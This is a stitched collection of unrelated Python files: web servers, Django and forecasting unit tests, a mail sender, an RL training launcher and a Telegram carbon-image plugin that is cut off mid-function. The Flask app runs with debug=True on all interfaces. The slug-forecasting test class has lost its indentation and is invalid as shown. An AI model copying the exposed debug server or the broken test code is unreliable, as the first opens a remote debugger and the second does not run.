  sqlite-backed store factory. Subclasses register additional handlers via
  add_handler() and periodic coroutines via self.callbacks.
  """

  def __init__(self, config, port, root=''):
    self.config = config
    self.port = port
    self.root = root  # URL prefix under which all routes are mounted
    self.db_factory = store.create_store_factory_for_sqlite_db(self.config)
    # FIX: self.routes was initialised twice in the original; one
    # assignment before the first add_handler() call suffices.
    self.routes = []
    self.start_time = datetime.datetime.utcnow()
    self.add_handler(HealthHandler, start_time=self.start_time)
    self.callbacks = []

  def add_handler(self, handler, **kwargs):
    """Register *handler* under root + handler.ROUTE; kwargs are passed to
    the handler's initialize()."""
    route = os.path.join("/", self.root, handler.ROUTE.lstrip('/'))
    self.routes.append((route, handler, kwargs))
    logging.info("{}: {} serving on {}".format(
      self.__class__.__name__, handler.__name__, route))

  def make_app(self) -> tornado.web.Application:
    """Build the tornado Application from the registered routes."""
    return tornado.web.Application(self.routes)

  def run(self):
    """Start listening, spawn the registered callbacks and run the IO loop
    (blocks until the loop is stopped)."""
    logging.info(
      "{} running on port {}".format(self.__class__.__name__, self.port)
    )
    app = self.make_app()
    app.listen(self.port)
    io_loop = tornado.ioloop.IOLoop.current()
    for callback_obj in self.callbacks:
      io_loop.spawn_callback(callback_obj)
    io_loop.start()
|
# vim: set encoding=utf-8
from unittest import TestCase
from mock import patch
from django.conf import settings
from django.test import RequestFactory
from regulations.views import utils
class UtilsTest(TestCase):
    """Tests for the regulations.views.utils helpers."""

    def setUp(self):
        # Snapshot settings that tests may clobber so tearDown can restore.
        if hasattr(settings, 'ANALYTICS'):
            self.old_analytics = settings.ANALYTICS
        if hasattr(settings, 'JS_DEBUG'):
            self.old_js_debug = settings.JS_DEBUG

    def tearDown(self):
        if hasattr(self, 'old_analytics'):
            settings.ANALYTICS = self.old_analytics
        if hasattr(self, 'old_js_debug'):
            settings.JS_DEBUG = self.old_js_debug

    def test_get_layer_list(self):
        """Names are lower-cased, de-duplicated and unknown layers dropped."""
        names = 'meta,meta,GRAPHICS,fakelayer,internal'
        layer_list = utils.get_layer_list(names)
        # FIX: assertEquals is a long-deprecated alias (removed in
        # Python 3.12); use assertEqual.
        self.assertEqual(set(['meta', 'internal', 'graphics']), layer_list)

    def test_layer_names(self):
        """layer_names reads ?layers=, defaulting to the full set."""
        request = RequestFactory().get('/?layers=graphics,meta,other')
        self.assertEqual(utils.layer_names(request), set(['graphics', 'meta']))

        request = RequestFactory().get('/?layers=')
        self.assertEqual(utils.layer_names(request), set())

        request = RequestFactory().get('/')
        self.assertTrue(len(utils.layer_names(request)) > 4)

    @patch('regulations.views.utils.fetch_toc')
    def test_first_section(self, fetch_toc):
        """first_section returns the id of the first TOC entry."""
        fetch_toc.return_value = [
            {'section_id': '204-100', 'index': ['204', '100']},
            {'section_id': '204-101', 'index': ['204', '101']}]
        first = utils.first_section('204', '2')
        self.assertEqual(first, '204-100')

    def test_make_sortable(self):
        """Verify that strings get decomposed correctly into sortable tuples"""
        self.assertEqual(utils.make_sortable("abc"), ("abc",))
        self.assertEqual(utils.make_sortable("123"), (123,))
        self.assertEqual(utils.make_sortable("abc123def456"),
                         ("abc", 123, "def", 456))
        self.assertEqual(utils.make_sortable("123abc456"), (123, "abc", 456))

    @patch('regulations.views.utils.api_reader')
    def test_regulation_meta_404(self, api_reader):
        """We shouldn't crash if meta data isn't available"""
        ret_vals = [None, {}, {'111-22': 'something'}]
        for ret_val in ret_vals:
            api_reader.ApiReader.return_value.layer.return_value = ret_val
            self.assertEqual({}, utils.regulation_meta('111', 'vvv'))
|
from flask import Flask
from flask import request
from flask import render_template,url_for
from PIL import Image
import io
import base64
import cv2
import numpy as np
import urllib
from joblib import dump, load
from binascii import a2b_base64
import tensorflow as tf
# Load the trained digit classifier; the app stays importable without it.
try:
    model = tf.keras.models.load_model('my_model')
except Exception:
    # FIX: was a bare `except:` (which also swallows SystemExit and
    # KeyboardInterrupt) and left `model` undefined, causing a NameError
    # later in recognize_image. Define it as None so the failure mode is
    # explicit.
    model = None
    print("No model")
#MARK
app = Flask(__name__)
app.config['TEMPLATES_AUTO_RELOAD'] = True
def resize_image(image):
    """Scale an image array down to the 28x28 input the model expects."""
    return cv2.resize(image, (28, 28))
def recognize_image(image, is_tf = False):
    """Classify a 28x28 image with the globally loaded Keras model.

    Returns a ("TF", predicted_classes) tuple.
    NOTE(review): the `is_tf` parameter is accepted but never used — it looks
    like a second (non-TF) model path was planned; confirm intent.
    """
    print("tensorflow")
    # scale pixel values into [0, 1] as expected by the model
    # (assumes 0-255 input — TODO confirm)
    image = image/255.0
    # NOTE(review): predict_classes was removed in TF 2.6; pinned TF version
    # presumably still provides it — confirm.
    return "TF",model.predict_classes( np.array( [image,] ))
@app.route('/')
def index():
    """Serve the drawing-canvas front end."""
    return render_template("index.html")
@app.route('/recognize', methods=['GET','POST'])
def analyze():
    """Decode a canvas POST (base64 data URL) and classify the drawing.

    Returns the stringified result of recognize_image.
    NOTE(review): a GET request falls through and returns None, which Flask
    turns into an error — confirm whether GET should be supported at all.
    """
    if request.method == 'POST':
        data_url = request.values.get('data')
        model_type = request.values.get('type')
        # data URL format is "data:image/png;base64,<payload>"; keep payload
        encoded_image = data_url.split(",")[1]
        binary_data = a2b_base64(encoded_image)
        data_io = io.BytesIO(binary_data)
        img = Image.open(data_io)
        image_np = np.array(img)
        # keep only the alpha channel — assumes an RGBA canvas export where
        # the drawing lives in alpha (TODO confirm)
        image_np = image_np[:, :, 3]
        resized = resize_image(image_np)
        # "0" selects the non-TF path; anything else the TF path
        model_type = False if model_type == "0" else True
        a = recognize_image(resized, is_tf=model_type)
        return str(a)
if __name__ == '__main__':
    # NOTE(review): debug=True enables the Werkzeug debugger/reloader;
    # combined with host 0.0.0.0 this must not be used in production.
    app.run(host="0.0.0.0", port=8000, debug=True)
"""Test for the snakemake workflow distributed with region_set_profiler"""
import json
import subprocess
import os
import pandas as pd
import numpy as np
tmpdir = "/icgc/dkfzlsdf/analysis/hs_ontogeny/temp"

# TODO: gtfanno result has weird index
gtfanno_result: pd.DataFrame = pd.read_pickle(
    "/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/annotation/hierarchy-dmrs/v1/hierarchy-dmrs-anno_primary-annotations.p"
)
# all_regions_annotated = pd.read_pickle('/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/annotation/hierarchy-dmrs/v1/hierarchy-dmrs-anno_all-annotations.p')
# all_regions_annotated.loc[all_regions_annotated.feat_class == 'intergenic', 'feature_rank'] = 'primary'
# gtfanno_result_temp = '/home/kraemers/temp/gtfanno-temp.p'
# primary_annotations.to_pickle(gtfanno_result_temp)
# gtfanno_result = primary_annotations

# Collapse per-gene annotation rows into one comma-joined gene_name string
# per (Chromosome, Start, End, gtfanno_uid) region.
gene_annos = gtfanno_result.groupby(["Chromosome", "Start", "End", "gtfanno_uid"])[
    "gene_name"
].aggregate(lambda ser: ser.str.cat(sep=","))
# gtfanno_uid must be a dense 0..n-1 range; otherwise dropping the level
# below would silently misalign regions.
assert (
    gene_annos.index.get_level_values("gtfanno_uid") == np.arange(gene_annos.shape[0])
).all()
gene_annos.index = gene_annos.index.droplevel(3)
# BUG FIX: `tmpdir + "clustered-gene-annos.p"` concatenated without a path
# separator, producing ".../tempclustered-gene-annos.p"; join properly.
clustered_gene_anno_fp = os.path.join(tmpdir, "clustered-gene-annos.p")
gene_annos.to_pickle(clustered_gene_anno_fp)
# Code to merge DMRs which are closer than merging_distance bp
# This should be moved elsewhere
# merging could also be achieved with pyranges:
# 1. slop all intervals with merging_distance on both sides
# 2. Cluster all intervals
# 3. Use the clustered intervals to find groups of intervals within the clustered intervals and compute the group annotations
merging_distance = 500
gtfanno_result = gtfanno_result.query('feat_class == "Promoter"')
# Gap between each region's end and the next region's start.
# NOTE(review): this difference is also computed across chromosome
# boundaries, where it is meaningless — presumably rows are sorted per
# chromosome; confirm that cross-chromosome pairs cannot end up merged.
distance_to_next_region = (
    gtfanno_result.Start.iloc[1:].values - gtfanno_result.End.iloc[0:-1].values
)
# we iterate over the regions
# whenever the distance to the next region is > merging_distance, we begin a new cluster of regions
# In vectorized form:
region_cluster_ids = np.concatenate(
    [[1], 1 + np.cumsum(distance_to_next_region > merging_distance)], axis=0
)
# Compress to gene anno series for the merged DMRs
gene_annos = gtfanno_result.groupby(region_cluster_ids)["gene_name"].apply(
    lambda ser: ser.str.cat(sep=",")
)
gene_annos.to_pickle(clustered_gene_anno_fp)
# NOTE(review): the next line immediately overwrites the clustered
# annotation pickle written above with the raw, un-merged gene_name column —
# looks like experimentation leftovers; confirm which output is intended.
gtfanno_result["gene_name"].to_pickle(clustered_gene_anno_fp)
# Snakemake configuration for the region_set_profiler workflow: enrichment
# tasks (cluster-id partitions), metadata databases, the gene annotation
# pickle produced above, output locations and the chromosome set.
config = {
    "tasks": {
        "cluster_ids": {
            "no-basos/beta-value_zscores/metric-euclidean/linkage-ward/enrichments/min-gap_0.25": (
                "min-gap_0.25",
                "/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/clustering/full-hierarchy/method-selection/no-basos/beta-value_zscores/metric-euclidean/linkage-ward/cutree-all.p",
            ),
            # 'no-basos/beta-value_zscores/metric-euclidean/linkage-ward/enrichments/min-gap_0.12': ('min-gap_0.12',
            # '/icgc/dkfzlsdf/analysis/hs_ontogeny/results/wgbs/cohort_results/analyses/hierarchy/clustering/full-hierarchy/method-selection/no-basos/beta-value_zscores/metric-euclidean/linkage-ward/cutree-all.p')
        },
        "metadata_tables": {
            "codex": "/icgc/dkfzlsdf/analysis/hs_ontogeny/databases/enrichment_databases/lola_chipseq_2018-04-12/mm10/codex/regions/codex_annotations.csv",
            "msigdb_canonical_pathways": "/icgc/dkfzlsdf/analysis/hs_ontogeny/databases/region_set_profiler_databases/msigdb_gmts/canonical-pathways.gmt",
        },
        "gene_annotations": {"promoters_500-bp-clusters": clustered_gene_anno_fp},
    },
    "output_dir": "/icgc/dkfzlsdf/analysis/hs_ontogeny/temp/rsp-tests",
    "tmpdir": tmpdir,
    # mouse autosomes (mm10), no sex chromosomes
    "chromosomes": [
        "1",
        "10",
        "11",
        "12",
        "13",
        "14",
        "15",
        "16",
        "17",
        "18",
        "19",
        "2",
        "3",
        "4",
        "5",
        "6",
        "7",
        "8",
        "9",
    ],
}
config_fp = os.path.expanduser("~/temp/rsp-config.json")
with open(config_fp, "w") as fout:
    json.dump(config, fout)

# Run the workflow. NOTE(review): shell=True is acceptable here because the
# command is a fixed f-string built from local constants (no untrusted
# input); --forcerun re-triggers the one enrichment target under test.
subprocess.run(
    f"""
    snakemake \
        --snakefile {os.path.expanduser('~/projects/region_set_profiler/src/region_set_profiler/region_set_profiler.smk')} \
        --configfile {config_fp} \
        --cores 24 \
        --keep-going \
        --forcerun /icgc/dkfzlsdf/analysis/hs_ontogeny/temp/rsp-tests/no-basos/beta-value_zscores/metric-euclidean/linkage-ward/enrichments/min-gap_0.25/msigdb_canonical_pathways:promoters_500-bp-clusters/msigdb_canonical_pathways:promoters_500-bp-clusters.done
    """,
    shell=True,
    executable="/bin/bash",
)
# --dryrun \
|
"""
TCKDB backend app db base_class module
allows the creation of classes that include directives to describe the actual database table they will be mapped to
"""
from sqlalchemy.ext.declarative import declarative_base, declared_attr
class CustomBase(object):
    """
    A custom base class for generating __tablename__ automatically
    """
    @declared_attr
    def __tablename__(cls):
        # Table name defaults to the lower-cased model class name.
        return cls.__name__.lower()


# Declarative base shared by all ORM models; inherits the automatic
# __tablename__ behaviour from CustomBase.
Base = declarative_base(cls=CustomBase)
|
"""Demonstrate the link between eig(A A^T) and the SVD of A."""
import numpy as np

# Example 2x3 matrix.
arr = [[1, 2, 0], [0, 1, 1]]
arr = np.asarray(arr)

# H = A A^T is symmetric PSD; its eigenvalues are the squared singular
# values of A.
H = np.dot(arr, arr.T)
eigenval, eigenvec = np.linalg.eig(H)
print("----------A-----------")
print("eigen value is :", eigenval)
print("eigen vector is :", eigenvec)

print("----------B-----------")
u, s, vh = np.linalg.svd(arr, full_matrices=True)
# BUG FIX: the original labels were shifted (u printed as "s", s as "v",
# vh as "d"); also ported the Python 2 print statements to Python 3.
print("u is :", u)
print("s is :", s)
print("vh is :", vh)
import configparser
from email.mime.text import MIMEText
from email.header import Header
import smtplib
import logging
import sys
# Configure logging: INFO level, emitted to stdout.
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
                    datefmt='%a, %d %b %Y %H:%M:%S',
                    stream=sys.stdout)
def getConf():
    """Load the mail settings from sendemail/local.conf."""
    parser = configparser.ConfigParser()
    parser.read('sendemail/local.conf')
    return parser
def sendEmail(mail_msg,subject):
    """Send an HTML mail through QQ's SMTP-over-SSL service.

    :param mail_msg: HTML body of the message
    :param subject: subject line
    Credentials come from sendemail/local.conf via getConf().
    """
    config = getConf()
    strFrom = config.get("email", "sender")
    strTo = config.get("email", "receivers")
    # SMTP authorization code (QQ mail), not the account password.
    code = config.get("email", "code")
    message = MIMEText(mail_msg, 'html', 'utf-8')
    message['Subject'] = Header(subject, 'utf-8')
    message['To'] = strTo
    message['From'] = strFrom
    # SMTP_SSL(host) already connects during construction; the original's
    # extra smtp.connect() call re-established the connection redundantly.
    smtp = smtplib.SMTP_SSL('smtp.qq.com')
    try:
        smtp.login(strFrom, code)
        smtp.sendmail(strFrom,strTo,message.as_string())
    finally:
        # BUG FIX: the original evaluated `smtp.close` without calling it
        # (a no-op), leaking the connection. quit() sends QUIT and closes.
        smtp.quit()
def getContext():
    """Build the demo message.

    Returns a (html_body, subject) tuple consumed by sendEmail().
    """
    subject = '测试基于python3的QQ邮件发送功能'
    mail_msg = """
    <ul type='circle'>
        <li>hello python3</li>
    </ul>
    """
    return mail_msg, subject
if __name__ == '__main__':
    # Demo entry point: send the sample HTML message once.
    logging.info("begin send email")
    mail_msg,subject = getContext()
    sendEmail(mail_msg,subject)
    logging.info("end send email")
|
"""
Creates Singedup Home Tap
:license: MIT
"""
import json
from src.dependencies.dependency_typing import PynamoDBConsultant
def create_home_tap(consultant_uuid: str, consultant_model: PynamoDBConsultant):
    '''
    Creates Home tap with correct time from Consultant
    -
    :param consultant_uuid: Uuid of Consultant
    :param consultant_model: Consultant Model
    :return: the home-tab block-kit dict built from the signed-up template
    '''
    consultant = consultant_model.get(consultant_uuid)
    with open("src/templates/{0}.json".format('home_tap_template_signedup'), "r") as body:
        home_tap = json.load(body)
    # Pre-fill the check-in time picker when the consultant has one set.
    if consultant.time_for_checkin is not None:
        home_tap['blocks'][4]['elements'][0]['initial_time'] = consultant.time_for_checkin
    # BUG FIX: the original tested `consultant_model.same_day_checkin` (an
    # attribute on the model class) while reading the value from the fetched
    # `consultant` record — check the record itself. Debug prints removed.
    if consultant.same_day_checkin is not None:
        # stringify to tolerate both boolean and string storage of the flag
        if str(consultant.same_day_checkin) == 'True':
            home_tap['blocks'][5]['elements'][0]['initial_options'] =\
                [home_tap['blocks'][5]['elements'][0]['options'][0]]
    return home_tap
|
# -*- coding: utf-8 -*-
"""
Part of slugdetection package
@author: Deirdree A Polak
github: dapolak
"""
import numpy as np
import pandas as pd
import math
import unittest
from slugdetection.Slug_Forecasting import Slug_Forecasting
class Test_Slug_Forecasting(unittest.TestCase):
"""
Unit tests class for Slug Forecasting class
"""
def test_create_class(self, whp_pandas):
"""
Unit test for class creation
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy()) # Instantiate class
assert hasattr(test_class, "slug_df"), "slug_df attribute must be created"
assert isinstance(test_class.slug_df.index, pd.DatetimeIndex), "slug_df has DateTimeIndex"
whp_pandas_short = whp_pandas[:60].copy() # crop data frame
# Test that class does not get created if whp_pandas is too short
try:
test_class = Slug_Forecasting(whp_pandas_short)
print("pandas data frame is too short")
raise ValueError
except AssertionError:
pass
whp_pandas_nowhp = whp_pandas.copy()
whp_pandas_nowhp = whp_pandas_nowhp.drop("WH_P", axis=1)
# Test that class does not get created if whp_pandas does not contain WHP column
try:
test_class = Slug_Forecasting(whp_pandas_nowhp)
print("pandas data frame does not contain WH_P column")
raise ValueError
except AssertionError:
pass
whp_pandas_nots = whp_pandas.copy()
whp_pandas_nots = whp_pandas_nots.drop("ts", axis=1)
# Test that class does not get created if whp_pandas does not contain timestamp column
try:
test_class = Slug_Forecasting(whp_pandas_nots)
print("pandas data frame does not contain ts column")
raise ValueError
except AssertionError:
pass
# Test that other column in whp_pandas get ignored and dropped from slug_df attribute
whp_pandas_extravar = whp_pandas.copy()
whp_pandas_extravar["random"] = whp_pandas_extravar["WH_P"]
test_class = Slug_Forecasting(whp_pandas_extravar.copy())
assert "random" not in test_class.slug_df.columns, "In this example, random column should have been dropped"
def test_stationarity_check(self, whp_pandas, not_station_pd):
"""
Unit test for stationarity_check method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
not_station_pd : Pandas DataFrame
whp and ts data frame with non stationary data
"""
test_class = Slug_Forecasting(whp_pandas.copy()) # Instantiate class object
test_class.stationarity_check()
assert hasattr(test_class, "station_result"), "Station_result attribute is created"
assert test_class.station_result[0] < 0.05, "In this example, p-value should be less than 5%"
test_class.stationarity_check(diff=1)
assert test_class.station_result[0] <= 0.0, "In this example, p-value should be 0%"
test_class = Slug_Forecasting(not_station_pd.copy()) # Instantiate new object with non stationary data
test_class.stationarity_check()
assert test_class.station_result[0] > 0.05, "In this example, p-value should be more than 5%"
def test_split_data(self, whp_pandas):
"""
Unit test for split_data method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy())
test_class.stationarity_check()
test_class.split_data()
assert hasattr(test_class, "y_train"), "y_train attribute must have been create"
assert hasattr(test_class, "y_pred"), "y_test attribute must have been create"
assert len(test_class.y_train) == 180, "In this example, y_train should be 180 long"
assert len(test_class.y_pred) == 60, "In this example, y_pred should be 60 long"
test_class = Slug_Forecasting(whp_pandas.copy())
# test train size data
try:
test_class.split_data(train_size=400)
print("Not enough data to fulfill train_size requirement")
raise ValueError
except AssertionError:
pass
def test_ARIMA_model(self, whp_pandas):
"""
Unit test for ARIMA_model method
Parameters
----------
whp_pandas : Pandas DataFrame
whp and ts data frame
"""
test_class = Slug_Forecasting(whp_pandas.copy())
test_class.stationarity_check()
test_class.split_data()
test_class.ARIMA_model(1, 0, 1, show=False) # Fit results
assert hasattr(test_class, "fit_results"), "fit_results attribute must have been created"
def test_error_metrics(self, whp_pandas):
    """Unit test for the error_metrics method.

    Parameters
    ----------
    whp_pandas : Pandas DataFrame
        whp and ts data frame
    """
    forecaster = Slug_Forecasting(whp_pandas.copy())
    forecaster.stationarity_check()
    forecaster.split_data()
    forecaster.ARIMA_model(1, 0, 1, show=False)
    # An unknown error type is a no-op that returns None.
    assert forecaster.error_metrics(error="other", verbose=False) == None, "Nothing is returned"
    # Identical checks for the fitted values first, then the forecast values.
    for stage in ("fit", "pred"):
        if stage == "pred":
            forecaster.ARIMA_pred(pred_time=60, show=False)  # Forecast values
        assert len(forecaster.error_metrics(error=stage, verbose=False)) == 4, \
            "Three variables must be returned in this example"
        mape, mse, rmse, r2 = forecaster.error_metrics(error=stage, verbose=False)
        # Sanity-check the statistics themselves.
        assert r2 < 1.0, "Coefficient of Determination r2 should be less than 1"
        assert np.isclose(math.sqrt(mse), rmse, atol=0.01), \
            "Square rooted mean squared error should equal root mean squared error"
def test_ARIMA_pred(self, whp_pandas):
    """Unit test for the ARIMA_pred method.

    Parameters
    ----------
    whp_pandas : Pandas DataFrame
        whp and ts data frame
    """
    test_class = Slug_Forecasting(whp_pandas.copy())
    test_class.stationarity_check()
    test_class.split_data()
    test_class.ARIMA_model(1, 0, 1, show=False)
    # show=False keeps the test non-interactive, consistent with how
    # ARIMA_pred is called in test_error_metrics.
    test_class.ARIMA_pred(pred_time=60, show=False)
    assert hasattr(test_class, "forecast"), "Forecast attribute must have been created"
from baselines.common.cmd_util import make_vec_env, make_mujoco_env
from baselines.common.vec_env.vec_frame_stack import VecFrameStack
from arguments import achieve_arguments
from a2c_agent import a2c_agent
from baselines import logger
if __name__ == '__main__':
    args = achieve_arguments()
    # Point the logger at the run directory so TensorBoard can read it later.
    logger.configure(dir=args.log_dir)
    # create environments
    # episode_life/clip_rewards are disabled so raw episode rewards are kept.
    env_args = {'episode_life': False, 'clip_rewards': False}
    # VecFrameStack stacks the last 4 observation frames (standard Atari setup).
    # make_vec_env builds and wraps the Atari environments in vectorized form;
    # args.num_processes parallel environments enable multi-process training.
    envs = VecFrameStack(make_vec_env(args.env_name, 'atari', args.num_processes, args.seed, wrapper_kwargs=env_args), 4)
    trainer = a2c_agent(envs, args)
    trainer.learn()
    envs.close()
|
import asyncio
import os
import random
from urllib.parse import quote_plus

from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys

from ..Config import Config
from . import drgub, deEmojify, edit_or_reply
# Help-menu category this plugin's commands are registered under.
plugin_category = "utils"
# Language hint passed to carbon.now.sh; "auto" lets carbon detect it.
CARBONLANG = "auto"
@drgub.drg_cmd(
    pattern="carbon(?:\s|$)([\s\S]*)",
    command=("carbon", plugin_category),
    info={
        "header": "Carbon generators for given text (Fixed style)",
        "usage": [
            "{tr}carbon <text>",
            "{tr}carbon <reply to text>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Renders the command argument (or the replied-to message) as a code
    image via carbon.now.sh, exported through headless Chrome and sent
    back as a document.
    """
    # NOTE(review): this edit is immediately superseded by edit_or_reply
    # below — confirm whether the extra edit is intentional.
    await event.edit("`Processing..`")
    CARBON = "https://carbon.now.sh/?l={lang}&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    if pcode[8:]:
        # Inline text after the command (prefix + "carbon " is 8 chars).
        pcode = str(pcode[8:])
    elif textx:
        # Fall back to the replied-to message body.
        pcode = str(textx.message)
    pcode = deEmojify(pcode)
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    drg = await edit_or_reply(event, "`Carbonizing...\n25%`")
    url = CARBON.format(code=code, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    await drg.edit("`Be Patient...\n50%`")
    download_path = "./"
    # Register Chrome's devtools "send_command" endpoint so downloads can
    # be allowed in headless mode.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Click carbon's Export button; the PNG lands in download_path.
    driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
    await drg.edit("`Processing..\n75%`")
    await asyncio.sleep(2)  # give the download time to finish
    await drg.edit("`Done Dana Done...\n100%`")
    file = "./carbon.png"
    await drg.edit("`Uploading..`")
    await event.client.send_file(
        event.chat_id,
        file,
        caption="Here's your carbon",
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()
    await drg.delete()
@drgub.drg_cmd(
    pattern="krb(?:\s|$)([\s\S]*)",
    command=("krb", plugin_category),
    info={
        "header": "Carbon generators for given text. each time gives random style. You can also use patcicular style by using semicolon after text and name",
        "usage": [
            "{tr}krb <text>",
            "{tr}krb <reply to text>",
            "{tr}krb <text> ; <style name>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Renders the given (or replied-to) text as a carbon.now.sh image.
    An optional colour scheme may follow a semicolon after the text;
    otherwise a random scheme is picked from carbon's dropdown.

    Fixes vs. the original:
    - `skeme` was unbound on the reply path and `skeme.strip()` raised
      AttributeError whenever no style was supplied;
    - `Keys` was never imported (NameError when a style WAS supplied);
    - text containing more than one ';' crashed the tuple unpacking.
    """
    drg = await edit_or_reply(event, "`Processing....`")
    CARBON = "https://carbon.now.sh/?l={lang}&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    skeme = None  # requested colour scheme, if any
    if pcode[5:]:
        pcodee = str(pcode[5:])
        if ";" in pcodee:
            # Split only on the first ';' so extra semicolons stay in the text.
            pcode, skeme = pcodee.split(";", 1)
        else:
            pcode = pcodee
    elif textx:
        pcode = str(textx.message)
    pcode = pcode.strip()
    if skeme is not None:
        skeme = skeme.strip()
    pcode = deEmojify(pcode)
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    await drg.edit("`Meking Carbon...`\n`25%`")
    url = CARBON.format(code=code, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    await drg.edit("`Be Patient...\n50%`")
    download_path = "./"
    # Allow downloads in headless mode via the devtools protocol.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Open carbon's theme dropdown.
    driver.find_element_by_xpath(
        "/html/body/div[1]/main/div[3]/div[2]/div[1]/div[1]/div/span[2]"
    ).click()
    if skeme is not None:
        # Type the requested scheme name and pick the first suggestion.
        k_skeme = driver.find_element_by_xpath(
            "/html/body/div[1]/main/div[3]/div[2]/div[1]/div[1]/div/span[2]/input"
        )
        k_skeme.send_keys(skeme)
        k_skeme.send_keys(Keys.DOWN)
        k_skeme.send_keys(Keys.ENTER)
    else:
        # No style requested: pick a random entry from the dropdown list.
        color_scheme = str(random.randint(1, 29))
        driver.find_element_by_id(("downshift-0-item-" + color_scheme)).click()
    driver.find_element_by_id("export-menu").click()
    driver.find_element_by_xpath("//button[contains(text(),'4x')]").click()
    driver.find_element_by_xpath("//button[contains(text(),'PNG')]").click()
    await drg.edit("`Processing..\n75%`")
    await asyncio.sleep(2.5)  # give the download time to finish
    # Read back the scheme that was actually applied, for the caption.
    color_name = driver.find_element_by_xpath(
        "/html/body/div[1]/main/div[3]/div[2]/div[1]/div[1]/div/span[2]/input"
    ).get_attribute("value")
    await drg.edit("`Done Dana Done...\n100%`")
    file = "./carbon.png"
    await drg.edit("`Uploading..`")
    await event.client.send_file(
        event.chat_id,
        file,
        caption=f"`Here's your carbon!` \n**Colour Scheme: **`{color_name}`",
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()
    await drg.delete()
@drgub.drg_cmd(
    pattern="kar1(?:\s|$)([\s\S]*)",
    command=("kar1", plugin_category),
    info={
        "header": "Carbon generators for given text (Fixed style)",
        "usage": [
            "{tr}kar1 <text>",
            "{tr}kar1 <reply to text>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Fixed "synthwave-84" preset: renders the given (or replied-to) text
    via carbon.now.sh and uploads the exported PNG.

    Fix vs. the original: the Chrome driver was never quit, leaking a
    headless Chrome process per invocation.
    """
    drg = await edit_or_reply(event, "🔲🔲🔲🔲🔲")
    CARBON = "https://carbon.now.sh/?bg=rgba(249%2C237%2C212%2C0)&t=synthwave-84&wt=none&l=application%2Fjson&ds=true&dsyoff=20px&dsblur=0px&wc=true&wa=true&pv=56px&ph=0px&ln=false&fl=1&fm=IBM%20Plex%20Mono&fs=14.5px&lh=153%25&si=false&es=4x&wm=false&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    if pcode[6:]:
        pcode = str(pcode[6:])  # inline text after the command
    elif textx:
        pcode = str(textx.message)  # replied-to message body
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    url = CARBON.format(code=code, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    await drg.edit("🔳🔳🔲🔲🔲")
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    download_path = "./"
    # Allow downloads in headless mode via the devtools protocol.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Click Export; the PNG lands in download_path.
    driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
    await asyncio.sleep(1)
    await drg.edit("🔳🔳🔳🔲🔲")
    await asyncio.sleep(1)
